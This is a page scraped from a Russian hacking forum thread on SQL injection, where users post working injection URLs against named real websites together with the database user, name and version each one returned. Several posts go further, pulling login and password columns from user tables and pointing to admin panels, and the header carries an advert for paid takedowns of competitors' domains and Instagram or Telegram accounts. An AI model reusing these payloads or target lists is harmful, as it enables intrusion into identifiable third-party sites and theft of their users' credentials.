УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 1117 из 1242

1117

Опции темы

Поиск в этой теме

Опции просмотра

#11161

07.11.2009, 12:29

hack-win32

Познающий

Регистрация: 11.10.2009

Сообщений: 33

Провел на форуме:
88588

Репутация: 99

rim1234@localhost:marmoon:5.0.51a-24+lenny1-log

Код:

http://www.marmoon.com/games.php?id=-464+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10,11,12,13--

yoquiero_dan@localhost:yoquiero_games:4.1.22-standard

Код:

http://www.yoquierogames.com/games.php?id=-98+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10,11,12,13--

rebous@localhost:rebounddb:4.1.22-log

Код:

http://www.reboundsports.co.uk/tips-games.php?id=-34+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--

#11162

07.11.2009, 15:12

pelligrim

Познающий

Регистрация: 26.04.2008

Сообщений: 31

Провел на форуме:
31474

Репутация: 53

Код:

http://www.present-show.ru/corporate.php?id=-1+union+select+1,2,3,4,cast(concat_ws(0x3a,version(),database(),user())+as+binary),6,7,8,9,10,11--

4.1.11-standard:db_presentshow

resentshow@localhost

Код:

http://www.yamaha-center.ru/?vid=opis&obj=v&id=-3+union+select+concat_ws(0x3a,version(),database(),user()),2--

4.1.25-log:wwwkottedg_clubru_specuch:kottedgc_specuch@loc alhost

Код:

http://www.mos-afisha.ru/?page=17&id=-3+union+select+concat_ws(0x3a,version(),database(),user())--

4.1.22-log:melbis:melbis@10.0.1.201

Последний раз редактировалось pelligrim; 07.11.2009 в 16:57..

#11163

07.11.2009, 16:16

~~^YaHoo^~~

Banned

Регистрация: 02.01.2009

Сообщений: 29

Провел на форуме:
178075

Репутация: 85

Отправить сообщение для ^YaHoo^ с помощью ICQ

Код:

http://backgammon.gambler.ru/tournir/arch.php?tournir_id=-11+union+select+concat_ws(0x3a,version(),database(),user(),@@version_compile_os)--

5.0.85:keks:keks@localhost

ortbld-freebsd7.2

Код:

http://www.vashstile.ru/profile.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8,9,10--

5.0.22-log:admin_vashstile:admin_vashstile@localhost:unkn own-freebsd6.0

Код:

http://www.pin-code.ru/?pageId=1&subId=1+union+select+1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8,9,10

5.0.77-log

incode

incode@localhost

ortbld-freebsd6.3

Код:

http://www.funkit.ru/index.php?deviceCatID=1/**/union/**/select/**/concat_ws(0x3a,user(),database(),version())

funkit@localhost:funkit:5.0.77

Код:

http://www.9-ka.ru/index.php?nav=1'/**/union/**/select/**/1,concat_ws(0x3a,user(),database(),version()),3,4,5/*

только вот у меня проблема тут юзера не выводит

Код:

http://feodorovski.spb.ru/katalog.php?vars=1+union+select+1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20

5.1.19-beta:feodorovski:feodorovski@localhost

ortbld-freebsd6.2

#11164

07.11.2009, 16:25

~~[x60]unu~~

Banned

Регистрация: 07.05.2009

Сообщений: 103

Провел на форуме:
3202832

Репутация: 1588

Отправить сообщение для [x60]unu с помощью ICQ

http://pecpl.ru/main/index.html?id=1&nid=2/**/and/**/1=7/**/union/**/all/**/select/**/1,user(),1,version(),1,1,1,1/**/from/**/sys_users/**/limit/**/0,1
user - pecpl_ru@localhost
version - 5.0.51a-24+lenny2-log
database - pecpl_ru
table - sys_users (user_login, user_password)

http://pecpl.ru/main/index.html?id=1&nid=2/**/and/**/1=7/**/union/**/all/**/select/**/1,user_login,3,user_password,5,6,7,8/**/from/**/sys_users/**/limit/**/0,1

adminpanel - http://pecpl.ru/admin/logon/index.html

#11165

07.11.2009, 18:33

~~heyda4her~~

Banned

Регистрация: 11.08.2009

Сообщений: 4

Провел на форуме:
227915

Репутация: 17

Отправить сообщение для heyda4her с помощью ICQ

Цитата:

http://www.pharmacy-pal.com/product.php?cid=415

Цитата:

http://www.pharmacy-pal.com/product.php?cid=415+and+1=2

Цитата:

http://www.pharmacy-pal.com/product.php?cid=14)+UNION+SELECT+1,2,3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20,21,CONCAT(0x7873 716C696E6A626567696E,Version(),0x2F2A2A2F,Database (),0x2F2A2A2F,User(),0x7873716C696E6A656E64),23,24 ,25,26/*

pharmacy_altec@localhostxsqlinjend

#11166

07.11.2009, 23:26

Root-access

Участник форума

Регистрация: 18.06.2008

Сообщений: 222

Провел на форуме:
2223440

Репутация: 648

Отправить сообщение для Root-access с помощью ICQ

Вот небольшая партия sql-инъекций на довольно популярных сайтах:

ГУ-ВШЭ: _http://www.hse.ru/pressa2002/default.php?show=123+and+ascii(lower(substring(ver sion(),1,1)))=51

UpTime: _http://uptime.ru/downtime.php?host_id=-1+union+select+login,2,password,4,5,6,7,8,9,10,11, 12+from+users+limit+1,1

МИОО: _http://www.mioo.ru/podrnews2.php?idvalue=2144+and+ascii(substring(ver sion(),1,1))=53/*

ManageeCMS: _http://www.managee.ru/system/admin/?module=entry&action=edit&block=gallery&master_id= ' (нужно авторизоваться на _http://www.managee.ru/demo/)
_http://managee.ru/search/?q=%27&strict=0

ПЦУО: _http://couo.ru/search.asp (ввести ')

#11167

07.11.2009, 23:35

edge911

Участник форума

Регистрация: 21.02.2009

Сообщений: 228

Провел на форуме:
2175726

Репутация: 368

MSSQL

Цитата:

http://www.hotellikajaani.fi/index.asp?pid=79%27+or+79=(select+top+1+table_name +from+information_schema.tables+where+table_name+n ot+in+(%20%27www_pagelogic%27,%27www_pagetype0_set tings%27,%27www_pagetype1_settings%27,%27www_paget ype2_settings%27,%27www_pagetype3_settings%27,%27w ww_pagetype4_settings%27,%27www_pagetype8_settings %27,%27www_pagetypes%27,%27www_settings%27,%27www_ template1c_specs%27))%20--

Цитата:

http://www.championchip.fi/index.asp?pid=8%27+or+8=@@version%20--

PR 4

#11168

08.11.2009, 00:42

Bb0y

Участник форума

Регистрация: 30.10.2009

Сообщений: 103

Провел на форуме:
736224

Репутация: 388

Отправить сообщение для Bb0y с помощью ICQ

Отправить сообщение для Bb0y с помощью Yahoo

http://www.yu-tour.ru/country.php?id=-9+union+select+1,2,3,4,5,6,7,8,9,10,column_name,12 ,13,14,15+from+information_schema.columns+where+ta ble_name=0x6d6f64466565646261636b55736572--
MySQL 5.0.45-log
http://www.yu-tour.ru/country.php?id=-9+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a ,login,0x3a,password),12,13,14,15+from+modFeedback User--
modFeedbackUser::id:name:login:,password:,post
http://www.yu-tour.ru/admin
выводит все строки сразу

Последний раз редактировалось Bb0y; 08.11.2009 в 02:29..

#11169

08.11.2009, 00:43

onbka

Новичок

Регистрация: 29.10.2009

Сообщений: 15

Провел на форуме:
109810

Репутация: 17

Rolemancer

Цитата:

http://rolemancer.ru/sections.php?op=listarticles&secid=-87 union select concat_ws(0x3a ,user(),version( ),database()),2,3,4,5

rolemancer@localhost:5.0.75-0ubuntu10.2:rolemancer

#11170

08.11.2009, 08:33

-JC-

Познающий

Регистрация: 10.03.2009

Сообщений: 54

Провел на форуме:
110312

Репутация: 50

Отправить сообщение для -JC- с помощью ICQ

Код:

http://www.graphicjunkiehosting.co.uk/knowledgebase/index.php?cat=1+group+by+1+union+select+1,2,version()/*

Страница 1117 из 1242

1117

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 15 (пользователей: 0 , гостей: 15)

Быстрый переход